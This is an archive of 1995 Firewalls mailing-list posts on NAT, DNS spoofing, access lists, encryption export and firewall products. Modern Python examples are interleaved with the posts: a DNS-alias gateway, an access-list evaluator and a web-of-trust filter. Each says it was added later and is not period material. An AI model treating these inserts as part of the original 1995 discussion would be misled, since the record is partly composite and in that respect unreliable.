To: "firewalls@GREATCIRCLE.COM" , "Wilner@DOCKMASTER.NCSC.MIL"
Subject: RE: Re: B2 rated WIndows NT?
Date: Tue, 10 Oct 1995 11:06:51 -0700

This summer we passed a C2 security evaluation. We have no current plans to evaluate as a B level product ourselves. We have a number of third parties investigating doing this work, but nothing is currently pending.

>>>
----------
From: Wilner@DOCKMASTER.NCSC.MIL[SMTP:Wilner@DOCKMASTER.NCSC.MIL]
Sent: Monday, October 09, 1995 4:42 PM
To: firewalls@GREATCIRCLE.COM
Subject: Re: B2 rated WIndows NT?

> It's said that there is a [B2-secure Windows NT] available.
> Does any one know where can I get more information about that?
Don't believe it. Microsoft has neither the inclination nor the experience to satisfy the rigorous design and documentation requirements to merit such a rating.

>>> Not true on either count.

Greg King
Microsoft Corp.
BackOffice Capacity Planning Manager

I have certainly heard many, many stories about Microsoft's forays into the world of trusted computing. I have not seen any evidence personally. The best POC that I know of at this time is Ken Moss, 206-936-7774. Come to think of it, the area code may have changed to 360.

From firewalls-owner Tue Oct 10 12:45:43 1995
Date: Tue, 10 Oct 1995 14:28:53 -0500 (CDT)
From: "Frank K. Senter"
To: Paul A Vixie
cc: firewalls@greatcircle.com
Subject: Re: Network Address Translation stuff
In-Reply-To: <9510061801.AA28453@wisdom.home.vix.com>

What sort of "border gateways" keep track of relative time between requests for external DNS info and connection attempts to external sites? What's an "explicit proxy"?

Frank Senter
Senior Information Specialist
Missouri Highway and Transportation Department
P.O. Box 270
Jefferson City MO 65102

On Fri, 6 Oct 1995, Paul A Vixie wrote:
> In private e-mail, someone quoted me and then asked a question which I have
> decided to answer here:
> [Phwwit]
>
> Some of the assumptions, especially the tight binding between DNS replies and
> remote server identities, are unpleasantly constraining. I observe that this
> situation is only encountered by clients who don't know about explicit proxies,
> and as such, most of the user population won't have to suffer with it. Older
> and dumber clients _do_ work, though. And the benefits of using an RFC 1597
> network are just extreme: no renumbering when switching carriers; multihoming
> for free; absolute packet-level security no matter who misconfigures what.
>

From firewalls-owner Tue Oct 10 13:01:06 1995
Date: Tue, 10 Oct 1995 12:21:47 -0700
Message-Id: <199510101921.MAA08517@translation.com>
To: boone@isc.upenn.edu (Jon 'tex' Boone), lasseh@microfront.se, Firewalls@GreatCircle.COM
From: Andrew Foss
Subject: Re: Address Translators

Re: Jon 'tex' Boone's descriptions of the PIX:

> I'm glad that you brought this up. I have done an evaluation of this
>product and have some criticisms of how it works.
>
> 1) The version I looked at did not support MTU discovery [according to
>the guy who wrote the code.] This meant overall poor performance since
>everywhere that I was trying to go to through the PIX was "off-net" and
>required a 512-byte MTU. :-(

UNTRUE, the PIX is transparent. MTU discovery is an issue that proxies deal with; the PIX, on the other hand, has NO bearing on MTU!
> > 2) The box will map your address into a new range dynamically and does so
>well - however, you must already be numbered in a reserved range if you
>want to have "global" connectivity. For example, if you have already set up
>your network [net 20.0.0.0, say] and you want to use this box to dynamically
>map you into your provider's space, you need to renumber into the reserved
>net 10.0.0.0 space if you want to be able to reach the site that is going to
>be legitimately using net 20.0.0.0.

Most people who choose to continue to use other people's addresses merely add static routes to the publicly accessible systems they may need to get to in the overlapped address space. You also need to be sure those numbers don't occur internally. For example 20.0.0.0 belongs to CSC; they have a web site at 20.1.10.127. Don't use 20.1.10.127, and provide a static route to that network if you really need to contact it! In fact, many of the Class A owners prefer to dedicate a Class C to their public machines anyway! Nonetheless, if you have the option, 10.0.0.0 is a better choice!

Andrew Foss                  Tel. 415/494-NETS(6387)
Network Translation Inc.     Dir. 415/855-0725
1901 Embarcadero Rd.         FAX 415/424-9110
Palo Alto, CA 94303
email afoss@translation.com
web www.translation.com

From firewalls-owner Tue Oct 10 13:31:13 1995
Date: Tue, 10 Oct 1995 16:23:08 -0700
Message-Id: <199510102323.QAA14260@Fe3.rust.net>
To: Firewalls@GreatCircle.COM
From: janken@rust.net (Kenneth J. Stephens)
Subject: Firewall Market Stats (sort of)

I just received the latest Computer Security Institute (CSI) INTERNET Survey results in today's mail. It has a breakdown of what firewall products the respondents use. It is copyrighted so I won't publish it here. Contact them at:

Computer Security Institute
600 Harrison St.
San Francisco, CA 94107
(415) 905-2626

Ken.

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[]                                                                        []
[] Ken Stephens             Senior Capacity Planner/Data Security Officer []
[] email: Ken_Stephens@miconsulting.com              Voice (313) 876-5081 []
[] Michigan Employment Security Commission (MESC)      Fax (313) 876-6827 []
[] 7th Fl. I.S.                                                           []
[] 7310 Woodward Ave                                                      []
[] Detroit, MI 48202                                                      []
[]                                                                        []
[] Millennium Consulting                     Your Security Policy is only []
[] 28234 Diesing Dr.                     as strong as your organization's []
[] Madison Heights, MI 48071                            commitment to it. []
From firewalls-owner Tue Oct 10 13:43:24 1995
From: Adam Shostack
X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School
To: daveyb@iagi.net (David A. Baldwin)
Cc: firewalls@GreatCircle.COM
Date: Tue, 10 Oct 1995 16:38:43 -0400 (EDT)
Message-Id: <199510102038.QAA14326@leonardo.bwh.harvard.edu>
In-Reply-To: from "David A. Baldwin" at Oct 6, 95 03:57:24 pm
X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8
Subject: Re: An interesting dilema that I could use help with

David A. Baldwin wrote:

| We have a few Xylogics Annex 3 terminal servers at We would like to place
| a firewall between the Terminal server and the boot/security server. The
| firewall package that we use is Raptor's firewall product.

Since this is turning out to be difficult, why not put a bastion host that
handles only boot management next to the annex? People can attack your boot
server through the dialups, but since that's a one function box, it can be
tied down very tightly, with a bit of read only disk, so it may be safe enough.
People can't get from your dialups to the Internet or your private networks
without authenticating through the firewall, which we'll hope uses strong
authentication.

(I'm not the ascii artist you are, but--)

  ------------------------------------
  |              |                   |
  terminal      boot            firewall +---------- Internet
  server       server               |
   - pc                             |
                              private network

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From firewalls-owner Tue Oct 10 14:12:37 1995
From: Adam Shostack
X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School
To: raberry2@ix.netcom.com (Ron Berry)
Cc: firewalls@GreatCircle.COM
Date: Tue, 10 Oct 1995 16:26:23 -0400 (EDT)
Message-Id: <199510102026.QAA14248@leonardo.bwh.harvard.edu>
In-Reply-To: <199510101838.LAA19278@ix2.ix.netcom.com> from "Ron Berry" at Oct 10, 95 11:38:05 am
X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8
Subject: Re: International Encryption Protocols (RC2) or (IDEA)

Ron Berry wrote:

| international basis. One vendor supports RC2 for the standard
| international encryption algorithm. I know little about RC2 and was
| hoping someone could shed some light on this for me.
| What is the
| definition of the acronym; What key length is it based on; Who or what
| organization is responsible for it (who designed it); is it widely
| used???

RC2 is a trade secret of RSADSI. RC probably stands for 'Ron's Code,' after
the author, Ron Rivest. It is not widely used, as it is slower than RC4, and
until recently, there was no way of knowing which of the two algorithms is
stronger. Thus, people using RSA technology tended to use RC4 instead.

If an encryption algorithm can be exported from the United States, it is, by
law, quite weak. I would urge that you look at buying your encryption
technology outside of the US for worldwide deployment.

IDEA is a relatively new cryptosystem, but it has been subjected to a fair
amount of scrutiny, and it seems to resist most attacks well. RC2, being
private, has not been subjected to anything like the same kind of scrutiny.

I would suggest using IDEA or 3DES as your main bulk cryptosystem.

For an excellent introduction to cryptography, read Bruce Schneier's Applied
Cryptography. Any good technical library should have it. (I'd put off buying a
copy; the much expanded second edition should be out soon.)

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume
From firewalls-owner Tue Oct 10 15:17:46 1995
From: Adam Horwitz
To: firewalls@greatcircle.com
Date: Tue, 10 Oct 1995 17:08:43 -0500 (CDT)
Message-Id: <199510102208.RAA14884@vger.tripcom.com>
In-Reply-To: <199510102323.QAA14260@Fe3.rust.net> from "Kenneth J. Stephens" at Oct 10, 95 04:23:08 pm
Subject: Re: Firewall Market Stats (sort of)

> I just received the latest Computer Security Institute (CSI) INTERNET Survey
> results in today's mail. It has a breakdown of what firewall products the
> respondents use.

Interesting how that graph appears. I really have to question the accuracy of
the information. Partly because the list is neither in alphabetical nor rank
order, and partly because the numbers just don't look right to me.

--
Adam Horwitz                 (708) 778-9531
Tripcom Systems Inc.         adam@tripcom.com
From firewalls-owner Tue Oct 10 15:30:10 1995
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
To: serge@freelunch.freenet.kiev.ua (Sergey Zhuk)
Cc: Firewalls@GreatCircle.COM
Date: Wed, 11 Oct 95 8:07:39 EST
Message-Id: <9510102207.AA03777@citecub.citec.qld.gov.au>
In-Reply-To: ; from "Sergey Zhuk" at Oct 10, 95 2:10 pm
Subject: Re: IP seq. number attacks

Hi,

With the setup you have, there is no real reason that I can see to exchange
routing information with your provider. You can both live with static routes.
You set the default route on your router to be his router. That way you can
always get out. He sets a static route to your router on his. There probably
isn't even any reason for the ISP to use dynamic routes since he probably
only has one connection to another router.

Colin

> hi
>
> I'm using extended access list filters on external interfaces to prevent subj.
> But there's still one problem: if you have an addr. from _your_ subnet addr. on
> the remote end (your provider's router) you should permit packets from this
> address, which are coming from the external (for your network) interface.
> This is true at least when I'm exchanging routing information with that host:
>
>           I2
>   ------      ------------
>  |  R1  |----| R external |------ Internet
>   ------      ------------
>     | I1
>     |
>   -----
>  | LAN |
>   -----
>
> R1 - router for my site
> R external - router of my provider
> I1 - internal (LAN) interface
> I2 - external interface.
>
> Suppose I2 has IP addr: xx.xx.xx.128 netmask 255.255.255.224 and
> I2 on R external has IP addr: xx.xx.xx.129 netmask 255.255.255.224,
> I1 has IP addr: xx.xx.xx.69 netmask 255.255.255.224.
> So I have different subnets of network xx.xx.xx.0, assigned to diff.
> interfaces.
>
> I can prevent incoming packets from R external with source address
>     xx.xx.xx.0 0.0.0.255 any
> but I should permit
>     xx.xx.xx.129 0.0.0.0
> thus permitting subj. from at least one address.
> Sure that's better than subj. from any of 254 addresses, but what a hell ;).
>
> Any suggestions ?
>
> Another thing: ICMP redirects, whom I can trust and how to set up properly
> an access list for this. I've found at least 3 types of ICMP redirects
> mentioned in CISCO docs...
>
> rgds,
> serge
>
> --
> +-------------------------------------+-------------------------------------+
> | Sergey Zhuk                         | serge@freenet.kiev.ua               |
> | UN Internet Project                 | +380-44-228-6393                    |
> | System and Network Administrator    | www.freenet.kiev.ua, www.un.kiev.ua |
> +-------------------------------------+-------------------------------------+

From firewalls-owner Tue Oct 10 15:42:37 1995
From: Paul A Vixie
To: firewalls@greatcircle.com
Date: Tue, 10 Oct 1995 15:17:03 -0700
Message-Id: <9510102217.AA30889@wisdom.home.vix.com>
In-Reply-To: Your message of "Mon, 09 Oct 1995 17:17:12 EDT." <199510092117.RAA03630@bramber.windsor.com>
Subject: Re: Network Address Translation stuff

First:

[smith]
> Doesn't this assume that the smart DNS server knows which of these
> protocols is being requested for each address, so that it knows which
> proxy to start up on the socket it created? Or am I missing something?

[vixie]
> yes, or it requires a kernel with a preemptive icmp socket.

[smith]
> Sorry, I didn't make my question obvious. How does the DNS
> server know if a request for the name foo.bar.com is for
> FTP, telnet, finger, or whatever? I assume it could tell
> SMTP by an MX request, but what about the others?

There's a socket you can open in modern BSD kernels that tells you about all
the ICMP errors received or generated by the local host.
If you do a little bit of kernel work you can make this socket preemptive,
that is, arrange for it to be the endpoint of locally generated events rather
than merely a notification that such were sent. When one is about to be sent,
you can see if it's for an address you're proxying for, and if it is you open
a listener for the appropriate port and tell the kernel to retry; otherwise
you send the ICMP out so the remote connectee hears about it.

Naturally you need source code for this. Linux, BSD/OS, FreeBSD, NetBSD all
provide it. Solaris, Digital UNIX, HP-UX, and so on do not. And you will need
some expertise, which you can grow locally or buy from outside. If you don't
have the expertise to do it, you probably want to buy the whole technology
suite from someone else, such as our next contestant, who works for "Network
Translation Inc.":

[vixie]
> Assume that the name server is smart enough to answer "creatively" when
> asked certain questions by internal hosts about external hosts. [...]

[foss]
> This is generally referred to as DNS spoofing not network address
> translation. DNS spoofing does save many people a lot of socks and proxy
> admin work, but it is not true address translation.

In the case of FTP, I feel that DNS spoofing is better than NAT. For that
matter, any protocol which encodes and encapsulates endpoint addresses should
be spoofed rather than translated -- that's my story, and I'm sticking to it;
your mileage may vary, void where prohibited, and please don't expect me to
argue with you about it. You're right that it's not NAT and I regret that I
didn't point out this subtle difference in terminology.

Finally:

[vixie]
> Some of the assumptions, especially the tight binding between DNS replies
> and remote server identities, are unpleasantly constraining. I observe
> that this situation is only encountered by clients who don't know about
> explicit proxies, and as such, most of the user population won't have to
> suffer with it.
> Older and dumber clients _do_ work, though. And the
> benefits of using an RFC 1597 network are just extreme: no renumbering when
> switching carriers; multihoming for free; absolute packet-level security no
> matter who misconfigures what.

[senter]
> What sort of "border gateways" keep track of relative time between
> requests for external DNS info and connection attempts to external sites?

I must be really slow today, I thought I was just describing the sort of
"border gateway" that keeps track of the relative time between requests for
external DNS info and connection attempts to external sites. As far as I know
there's no shrinkwrapped product that does this -- today.

[senter]
> What's an "explicit proxy"?

Something like socks, or the TIS ftp-gw, or a proxy httpd. Anything that
requires the client to act differently when speaking to it is an "explicit"
proxy. Anything that requires no changes, awareness or context in the client
is an "implicit" proxy. "Implicit" is better overall, since you can't always
change the client. "Explicit" is better as a point solution where you have
control over all aspects of the design and you want to avoid any added costs
from spoofing (sometimes an implicit proxy has to maintain invariants that
don't matter in every connection, and this can cost you in performance.)

I had no idea that this discussion would go on so long. As before, I am not on
the firewalls mailing list, so if you want me to see your reply, CC me.

Paul Vixie
La Honda, CA                    "Illegitimi non carborundum."
pacbell!vixie!paul              (don't let the bastards grind you down)
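The border gateway Vixie describes, in which the site's name server hands internal clients an alias address for an external name and the gateway later matches a connection to that alias back to the real host, as an added Python model. This is example code written for this archive, not Vixie's software or any product; the 10.255.0.0/16 alias pool, the TTL, the port-to-proxy table (using TIS FWTK component names) and the `on_connect` hook are all assumptions. The client needs no changes, which is what makes this an implicit proxy, and because the alias is a private address the packets can never leave the site on their own: whatever the client speaks, including address-carrying protocols such as FTP, is handled by the proxy the gateway starts, which is the "spoof rather than translate" point made above. The expiry of bindings is why the gateway must track the time between the DNS answer and the connection attempt.

```python
import ipaddress

# Proxy to start for a given destination port. The names are TIS FWTK
# components; which one a real gateway would run is this example's assumption.
PROXY_FOR_PORT = {21: "ftp-gw", 23: "tn-gw", 80: "http-gw"}
DEFAULT_PROXY = "plug-gw"


class DnsAliasGateway:
    """Border gateway for the 'DNS spoofing' scheme discussed above.

    Internal clients ask the site's name server for an external name and get
    back an alias from a private pool. When a packet for an alias reaches the
    gateway, the live binding says which real host it stands for and the
    gateway starts the proxy appropriate to the port. Bindings expire so the
    pool can be reused.
    """

    def __init__(self, pool_cidr="10.255.0.0/16", ttl=300):
        self._free = list(ipaddress.ip_network(pool_cidr).hosts())
        self._ttl = ttl
        self._live = {}      # alias -> (real address, name, expiry time)
        self._by_name = {}   # name -> alias, so repeat lookups reuse an alias

    def _expire(self, now):
        """Return expired aliases to the free pool."""
        for alias, (_, name, expires) in list(self._live.items()):
            if expires <= now:
                del self._live[alias]
                del self._by_name[name]
                self._free.append(alias)

    def resolve(self, name, real_addr, now):
        """Answer an internal query for `name`, whose real address `real_addr`
        was learned from the outside DNS, with an alias A record."""
        self._expire(now)
        alias = self._by_name.get(name)
        if alias is None:
            if not self._free:
                raise RuntimeError("alias pool exhausted")
            alias = self._free.pop(0)
            self._by_name[name] = alias
        self._live[alias] = (real_addr, name, now + self._ttl)   # refresh TTL
        return str(alias)

    def on_connect(self, alias_addr, port, now):
        """A client packet for alias_addr:port reached the gateway.

        Returns (real address, name, proxy to start), or None when no binding
        is live, in which case the packet is simply dropped.
        """
        self._expire(now)
        entry = self._live.get(ipaddress.ip_address(alias_addr))
        if entry is None:
            return None
        real_addr, name, _ = entry
        return real_addr, name, PROXY_FOR_PORT.get(port, DEFAULT_PROXY)


if __name__ == "__main__":
    # Constructed walk-through: lookup, FTP connect within the TTL, then a late
    # connect after the binding has expired.
    gw = DnsAliasGateway(pool_cidr="10.255.0.0/24", ttl=60)
    alias = gw.resolve("ftp.example.com", "198.51.100.10", now=0)
    print(alias, gw.on_connect(alias, 21, now=30), gw.on_connect(alias, 21, now=100))
```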
From firewalls-owner Tue Oct 10 16:00:02 1995
From: "Gene Amdur"
To: Rick Smith
Cc: firewalls@greatcircle.com, glenn@border.com
Date: Tue, 10 Oct 1995 18:47:20 -0400
Message-Id: <95Oct10.184940edt.4998@janus.border.com>
Subject: Re: Borderware (was: Information, We want information)

| Glenn Mackintosh writes:
|
| >.... That said, Border doesn't use a stock BSD based OS anyway. We
| >have put a large amount of effort into "hardening" the kernel so that it is
| >a solid base upon which to build a secure firewall.
| ... [snip] ....
| >We spent a considerable amount of manpower stripping down the kernel and
| >leaving only what was really needed. We removed the mechanisms which can be
| >used to gain privilege or increase the levels of access to the system.

Rick Smith writes:

| So, the "hardening" of the Borderware kernel consists primarily of
| eliminating unnecessary portions of the BSD kernel, correct?
|
| This is not intended as a "leading question" from a competitor, just
| an attempt to clearly understand what Borderware has done.

No, I would *not* say this is the case. A significant amount of work *has*
been done on eliminating the unnecessary portions of the BSD kernel. However,
a large amount of work has been done to take the remaining part of the BSD
kernel and both change it and add to it to give our firewall the functionality
we need.

--gene
gene@border.com - Sr. System Developer @ Border Network Technologies Inc.
From firewalls-owner Tue Oct 10 17:00:02 1995
From: okuyama@netcom.com (Darin Okuyama)
To: firewalls@greatcircle.com (Firewall Mailing List)
Date: Tue, 10 Oct 1995 16:54:42 -0700 (PDT)
Message-Id: <199510102354.QAA27388@netcom19.netcom.com>
Subject: TIS http proxy .. is it safe?

What is the current version of the "http" proxy from TIS (actually I mean the
toolkit)? Also, what security problems are known to exist in that version?

---Darin Okuyama

From firewalls-owner Tue Oct 10 17:42:39 1995
From: Paul Ferguson
Message-Id: <199510110031.RAA19988@lint.cisco.com>
Subject: Re: IP seq. number attacks
To: sgcccdc@citec.qld.gov.au (Colin Campbell)
Cc: serge@freelunch.freenet.kiev.ua, Firewalls@GreatCircle.COM
Date: Tue, 10 Oct 95 17:31:05 PDT
In-Reply-To: <9510102207.AA03777@citecub.citec.qld.gov.au>; from "Colin Campbell" at Oct 11, 95 8:07 am

> With the setup you have, there is no real reason that I can see to exchange
> routing information with your provider. You can both live with static routes.
> You set the default route on your router to be his router. That way you can
> always get out. He sets a static route to your router on his. There probably
> isn't even any reason for the ISP to use dynamic routes since he probably
> only has one connection to another router.

Bingo. In fact, I can understand why most providers would prefer to do static
routing when only a single access exists, simply because it is much simpler to
avoid injecting errant routes into an external routing protocol. :-)

In any event, the most compelling reason to do any type of dynamic routing
between a provider and client access is the presence of dual or multihomed
connectivity.

- paul

--
Paul Ferguson                         ||        ||
cisco Systems                         ||        ||
Consulting Engineering               ||||      ||||
pferguso@cisco.com               ..:||||||:..:||||||:..
                                  c i s c o  S y s t e m s
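Serge's access-list question (quoted in Colin Campbell's message above) and the static-route answer given by Colin and Paul here, as an added Python example that is not from any of the posters. It parses IOS-style extended access-list lines with wildcard masks and evaluates packets arriving inbound on I2 against two lists; 192.0.2.0/24 stands in for serge's xx.xx.xx block and the packets are constructed. The first list keeps the permit for the provider's router address that a routing protocol needs, and a packet forged with that source still gets through; the second, for a static-route setup, refuses the whole block. Note the first-match semantics: the host permit has to come before the block-wide deny. One caveat a practitioner will want: the static-route list also drops any ICMP errors the provider's router itself sends from xx.xx.xx.129 (unreachables, time exceeded), so the cleaner fix is to number the link from the provider's address space rather than from your own; that suggestion is mine, not one made in the thread.

```python
import ipaddress

WORD = 0xFFFFFFFF


def _to_int(dotted):
    return int(ipaddress.IPv4Address(dotted))


def _parse_spec(tokens):
    """Consume one IOS address spec from a token list.

    Accepts 'any', 'host A.B.C.D', or 'A.B.C.D W.W.W.W' (address plus wildcard
    mask, where a 1 bit in the wildcard means 'don't care').
    Returns (address, wildcard, remaining tokens).
    """
    if tokens[0] == "any":
        return 0, WORD, tokens[1:]
    if tokens[0] == "host":
        return _to_int(tokens[1]), 0, tokens[2:]
    return _to_int(tokens[0]), _to_int(tokens[1]), tokens[2:]


def parse_acl(text):
    """Parse 'access-list N {permit|deny} ip SRC DST' lines into rule tuples."""
    rules = []
    for line in text.strip().splitlines():
        tok = line.split()
        if not tok or tok[0].startswith("!"):
            continue                      # blank line or IOS comment
        if tok[0] == "access-list":
            tok = tok[2:]                 # drop the keyword and list number
        action, proto = tok[0], tok[1]
        if action not in ("permit", "deny") or proto != "ip":
            raise ValueError("unsupported rule: " + line)
        src, src_wc, rest = _parse_spec(tok[2:])
        dst, dst_wc, rest = _parse_spec(rest)
        rules.append((action, src, src_wc, dst, dst_wc))
    return rules


def _matches(addr, base, wildcard):
    mask = ~wildcard & WORD               # the bits that must match
    return addr & mask == base & mask


def evaluate(rules, src, dst):
    """First matching rule wins; IOS ends every list with an implicit deny."""
    s, d = _to_int(src), _to_int(dst)
    for action, base_s, wc_s, base_d, wc_d in rules:
        if _matches(s, base_s, wc_s) and _matches(d, base_d, wc_d):
            return action
    return "deny"


# Constructed stand-in for serge's xx.xx.xx.0 block: 192.0.2.0/24 (assumption).
# Applied inbound on the external interface I2. With a routing protocol running,
# packets from the provider's router (xx.xx.xx.129) must be let in, and because
# the first match wins that permit has to precede the block-wide deny.
ACL_DYNAMIC_ROUTING = """
access-list 101 permit ip host 192.0.2.129 any
access-list 101 deny   ip 192.0.2.0 0.0.0.255 any
access-list 101 permit ip any any
"""

# Static routes only: no routing updates need to come in from the provider's
# router, so the whole block can be refused on the outside interface.
ACL_STATIC_ROUTING = """
access-list 102 deny   ip 192.0.2.0 0.0.0.255 any
access-list 102 permit ip any any
"""


def demo():
    """Evaluate three constructed inbound packets under both lists.

    Returns {packet name: (verdict under 101, verdict under 102)}.
    """
    dyn, static = parse_acl(ACL_DYNAMIC_ROUTING), parse_acl(ACL_STATIC_ROUTING)
    packets = {
        "spoofed_lan_address": ("192.0.2.70", "192.0.2.69"),       # forged internal source
        "spoofed_provider_address": ("192.0.2.129", "192.0.2.69"),  # the remaining hole
        "genuine_outside_host": ("198.51.100.7", "192.0.2.69"),
    }
    return {name: (evaluate(dyn, s, d), evaluate(static, s, d))
            for name, (s, d) in packets.items()}


if __name__ == "__main__":
    for name, verdicts in demo().items():
        print(f"{name:28s} 101={verdicts[0]:6s} 102={verdicts[1]}")
```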
From firewalls-owner Tue Oct 10 19:42:39 1995
From: Michael Haberler
To: Brent Chapman
Cc: firewalls@GreatCircle.COM, mcb@GreatCircle.COM
Date: Wed, 11 Oct 1995 04:39:26 -0100 (GMT-0100)
Subject: Re: WE THE PEOPLE "....want the facts to make informed intel

On Tue, 10 Oct 1995, Brent Chapman wrote:

> Spam mistakenly wrote:
..
> Folks, the best way to deal with spam on a mailing list is to bring it to
> the attention of the list management (believe me, we know about this one
...

What about mailing list/news software which only would accept PGP-signed
messages where the keys must have a certificate path length of at least 2 in
the mailing list web of trust (i.e. a contributor must be endorsed by at least
two other)? Anybody aware of developments in this arena? Variations possible -
you get the idea.

I think it could reduce the random bozo factor by orders of magnitude. It will
be the mode of operation to come for communities of common interest to protect
against noise insertion by spammers.

NB: Scientific citation indices are just a low-tech form of webs of trust.

-michael

Michael Haberler                    mah@eunet.co.at
EUnet Austria Ltd                   MH182
A-1090 Vienna, Austria, Thurngasse 8/16
Tel: +43 (1) 31376   fax: +43 (1) 3106926
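The acceptance rule Haberler proposes, a contributor's key must be endorsed by at least two keys the list already trusts, as an added Python example that is not from his message or from any list software. The key ids and the endorsement graph are constructed, and actual PGP signature verification is assumed to be done elsewhere (for instance by running pgp over the message) and passed in as a boolean. Computing the accepted set to a fixed point is what lets trust chain outward from the list owners' keys while a ring of unknown keys that sign each other never gets in, which is the "noise insertion" case he is after.

```python
def accepted_keys(roots, endorsements, min_endorsers=2):
    """Compute the keys whose signed posts the list would accept.

    roots:        key ids the list owners vouch for directly
    endorsements: (endorser_key, endorsed_key) pairs, i.e. the key signatures
                  making up the list's web of trust
    A key is accepted once at least `min_endorsers` distinct, already accepted
    keys have signed it. Iterating to a fixed point lets trust chain outward
    from the roots; a ring of strangers signing one another never qualifies
    because none of them is accepted to begin with.
    """
    accepted = set(roots)
    signers_of = {}
    for endorser, endorsed in endorsements:
        if endorser != endorsed:                    # self-signatures do not count
            signers_of.setdefault(endorsed, set()).add(endorser)
    changed = True
    while changed:
        changed = False
        for key, signers in signers_of.items():
            if key not in accepted and len(signers & accepted) >= min_endorsers:
                accepted.add(key)
                changed = True
    return accepted


def posting_allowed(signer_key, signature_ok, accepted):
    """Gate for the list software: the message must carry a signature that
    verified (checked outside this example) from a key in the accepted set."""
    return bool(signature_ok) and signer_key in accepted


if __name__ == "__main__":
    # Constructed web of trust: two list-owner keys, two legitimately endorsed
    # members, one member endorsed only once, and a two-key sybil ring.
    roots = {"listowner", "moderator"}
    web = [("listowner", "alice"), ("moderator", "alice"),
           ("listowner", "bob"), ("alice", "bob"),
           ("alice", "mallory"),
           ("mallory", "eve"), ("eve", "mallory"), ("eve", "eve")]
    ok = accepted_keys(roots, web)
    print(sorted(ok), posting_allowed("bob", True, ok), posting_allowed("mallory", True, ok))
```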
From firewalls-owner Tue Oct 10 21:42:44 1995
From: Joseph Seanor
To: "A. Padgett Peterson, P.E. Information Security"
Cc: firewalls@greatcircle.com
Date: Tue, 10 Oct 1995 20:58:12 -0700 (PDT)
In-Reply-To: <951010134713.21056023@hobbes.orl.mmc.com>
Subject: Re: Windows NT

Where can people get the update for the C2 version of Windows NT? Other than
waiting for Microsoft to send the update. Is there a site on the net?

Joseph Seanor
CIBIR Corporation

From firewalls-owner Tue Oct 10 21:58:24 1995
From: Doug Kaye
To: firewalls@greatcircle.com
Date: Tue, 10 Oct 1995 21:39:36 -0700
Subject: Thanks to Brent!
I hope my fellow readers won't mind me taking up a slot in their inboxes for
this, but I want to publicly thank Brent Chapman for (a) making this list and
majordomo available to all of us, and (b) *finally* :-) coming out with his
excellent new book. ("Building Internet Firewalls", Chapman & Zwicky,
O'Reilly.) I attended one of Brent's seminars about a year ago and have been
awaiting the book ever since.

Thanks, Brent. It was worth the wait!

...doug

(FWIW, I have no other commercial, social or other connections with Brent or
his company.)

============================================================
Doug Kaye
Rational Data Systems, Novato, CA
Tel: 415-382-8400   FAX: 415-382-8441
http://www.rds.com

From firewalls-owner Tue Oct 10 22:12:39 1995
From: Brent@GreatCircle.COM (Brent Chapman)
To: Doug Kaye , firewalls@greatcircle.com
Cc: firewalls-book@GreatCircle.COM
Date: Tue, 10 Oct 1995 22:05:16 -0800
Subject: Re: Thanks to Brent!

At 9:39 PM 10/10/95, Doug Kaye wrote:
>I hope my fellow readers won't mind me taking up a slot in their inboxes
>for this, but I want to publicly thank Brent Chapman for (a) making this
>list and majordomo available to all of us, and (b) *finally* :-) coming
>out with his excellent new book. ("Building Internet Firewalls", Chapman
>& Zwicky, O'Reilly.) I attended one of Brent's seminars about a year ago
>and have been awaiting the book ever since.
>
>Thanks, Brent. It was worth the wait!
You're very welcome; I'm glad that folks find the list and the book useful.

-Brent

--
Brent Chapman         | Great Circle Associates  | For Firewalls Tutorial info:
Brent@GreatCircle.COM | 1057 West Dana Street    | Tutorial-Info@GreatCircle.COM
+1 415 962 0841       | Mountain View, CA 94041  | http://www.greatcircle.com

From firewalls-owner Wed Oct 11 00:00:10 1995
From: Bengt Gorden
To: Firewalls@GreatCircle.COM
Date: Wed, 11 Oct 1995 07:41:15 -0500
Message-Id: <199510110644.XAA18621@miles.greatcircle.com>
Subject: Re: Oracle <-> Firewall

>From: gary flynn
>Date: Tue, 10 Oct 1995 08:28:47 -0400
>Subject: Re: Oracle <-> Firewall
>
>> From: David Schnardthorst
>> Subject: Oracle <-> Firewall
>>
>> Does anybody know of a way to get Oracle Information through a Firewall?
>>
>> We are setting up a firewall, with our Web Servers on the outside, however
>> we need to pass some information from an Oracle Database through the firewall
>> to the outside Web Servers.
>>
>> Has anybody done this, and if so, could you please give me some ideas of
>> how to accomplish this.
>>
>
>I asked this about a month ago and haven't summarized so I'll do so now.
>
>There is no proxy version of SQLnet or its overlying applications.
>Everyone is using a pass-thru filter like TIS's FWTK plug-gw or a
>filtering router to pass SQLnet. Five or six people gave me the same
>answer.
>
>There are probably two ways to do a SQLnet proxy. The first would
>be to build a lot of intelligence into the proxy itself that could
>understand what actions on what databases by what user was being
>requested. The second would be to provide an API to SQLnet
>based applications that allowed for things like querying for
>authentication information. In either case, Oracle would have to
>do it and the second case would involve modification of lots of
>applications. Just idle speculation on my part :-)
>

Maybe I miss something here but wasn't the point to pass information from the
Oracle server to the Web server? If that is the case you could use Oracle's Web
server. This will not automatically give you security but you will be able to
use the http proxy.

/Bengan

From firewalls-owner Wed Oct 11 01:30:05 1995
From: "Johnson-Bryden, Ian"
To: "'firewalls@greatcircle.com'"
Date: Wed, 11 Oct 95 09:17:00 GMT
Message-ID: <307B8386@smtpgty.saicuk.co.uk>
Subject: Re: International Encryption Protocols (RC2) or (IDEA)

There is a lot of misinformation circulating about encryption.

The OECD is due to make an announcement of recommendations around May next
year which will apply to some 24 nations. The European Commission has
encryption high on its agenda.
DGXIII is reviewing the matter in respect of encryption across the member
states and across international boundaries. An announcement could be made this
year. Unlike OECD recommendations, work by the Commission will become a
directive within the EU and that will supersede national legislation in the
member states, or, more accurately, require member states to enact national
legislation in support of the directive.

It remains to be seen how this will interact with US Federal regulations and
policies, but as the EU (and the countries preparing to make application to
join the EU) represents the largest world economic group and market, it will
be very difficult for other countries to ignore the EU policy. There is also a
suggestion that encryption may be covered under GATT in that some national
attitudes could be claimed to be in restraint of trade.

At present any vendor can make claims and come up with creative ways around
existing legislation, but the question is how this will later sit with
